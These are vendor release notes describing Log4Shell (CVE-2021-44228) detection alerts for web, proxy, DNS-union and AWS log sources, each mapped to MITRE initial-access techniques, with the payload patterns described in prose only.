Document toolboxDocument toolbox

Log4Shell detection release notes

Owned by Juan Tomás Alonso Nieto (Deactivated)
May 23, 2022
1 min read

The below document contains the release notes of the specific detections that Devo has released to detect whether your organization is being actively probed for log4j exploitation susceptibility.

The log4j JNDI attack

Image credits by Swiss Government Computer Emergency Response Team (GovCERT)

Data Source

Domains All. Union Table (Data from DNS, Proxy, Web, IDS, and many others)

Affected Columns

raw

Alert Description

Alert that checks attempts of exploiting CVE-2021-44228 known as Log4shell. The query looks for payload patterns associated with this vulnerability on the log raw message. This would include payloads included in the url, user-agent header, referer header or POST and PUT HTTP bodies. 

Mitre Tactic 

Initial-access

TA0001

Mitre Technique 

Exploit Public-Facing Application

T1190


Data Source

Web

Affected Columns

raw

Alert Description

Alert that checks attempts of exploiting CVE-2021-44228 known as Log4shell. The query looks for payload patterns associated with this vulnerability on the log raw message. This would include payloads included in the url, user-agent header, referer header or POST and PUT HTTP bodies

Mitre Tactic

Initial-access

TA0001

Mitre Technique 

Exploit Public-Facing Application

T1190


Data Source

Proxy

Affected Columns

raw

Alert Description

Alert that checks attempts of exploiting CVE-2021-44228 known as Log4shell. The query looks for payload patterns associated with this vulnerability on the log raw message. This would include payloads included in the url, user-agent header, referer header or POST and PUT HTTP bodies

Mitre Tactic 

Initial-access

TA0001

Mitre Technique

Exploit Public-Facing Application

T1190


Data Source

Cloud AWS

Affected Columns

raw

Alert Description

Alert that checks attempts of exploiting CVE-2021-44228 known as Log4shell. The query looks for payload patterns associated with this vulnerability on the log raw message. This would include payloads included in the url, user-agent header, referer header or POST and PUT HTTP bodies

Mitre Tactic 

Initial-access

TA0001

Mitre Technique

Exploit Public-Facing Application

T1190